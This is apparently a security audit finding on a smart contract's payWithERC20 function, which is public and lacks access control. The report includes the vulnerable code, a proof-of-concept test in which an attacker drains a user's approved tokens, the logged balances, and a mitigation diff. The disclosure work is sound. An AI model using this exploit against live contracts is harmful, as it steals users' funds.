Warm Golden Turkey

High

# all allowances can be steal

### Summary

lacks of access control in function payWithERC20 allow to malicius user can steal funds to user who approved contract blueprintv5.sol

### Root Cause

```javascript
  function payWithERC20(
        address erc20TokenAddress, 
        uint256 amount, 
        address fromAddress, 
        address toAddress
        ) public {
        // check from and to address
        require(fromAddress != toAddress, "Cannot transfer to self address");
        require(toAddress != address(0), "Invalid to address");
        require(amount > 0, "Amount must be greater than 0");
        IERC20 token = IERC20(erc20TokenAddress);
        token.safeTransferFrom(fromAddress, toAddress, amount);
    }
}
```
ass can see the function [payWithERC20 ](https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25-L32)lacks of any access control to avoid that malicius user transfer funds from other user  

### Internal Pre-conditions

N/A

### External Pre-conditions

N/A

### Attack Path

N/A

### Impact

users can loss funds 

### PoC

run this test 
```javascript 
function test_StealAllowances() public {
        uint256 amount = 100 * 10 ** 18;
        mockToken.mint(user, amount);// mint to user
        console.log("balance before user;",mockToken.balanceOf(user));
        console.log("balance before attacker;",mockToken.balanceOf(attacker));

       vm.prank(user);
       mockToken.approve(address(blueprint), amount);

       vm.prank(attacker);
       blueprint.payWithERC20(address(mockToken), amount, user, attacker);

       console.log("balance after user;",mockToken.balanceOf(user));
       console.log("balance after attacker;",mockToken.balanceOf(attacker));
    }
```
the result

 balance before user; 100000000000000000000
  balance before attacker; 0
  balance after user; 0
  balance after attacker; 100000000000000000000


### Mitigation

change the function from public to internal 
```Diff
  function payWithERC20(
        address erc20TokenAddress, 
        uint256 amount, 
        address fromAddress, 
        address toAddress
-        ) public {
+      ) internal{
        // check from and to address
        require(fromAddress != toAddress, "Cannot transfer to self address");
        require(toAddress != address(0), "Invalid to address");
        require(amount > 0, "Amount must be greater than 0");
        IERC20 token = IERC20(erc20TokenAddress);
        token.safeTransferFrom(fromAddress, toAddress, amount);
    }
```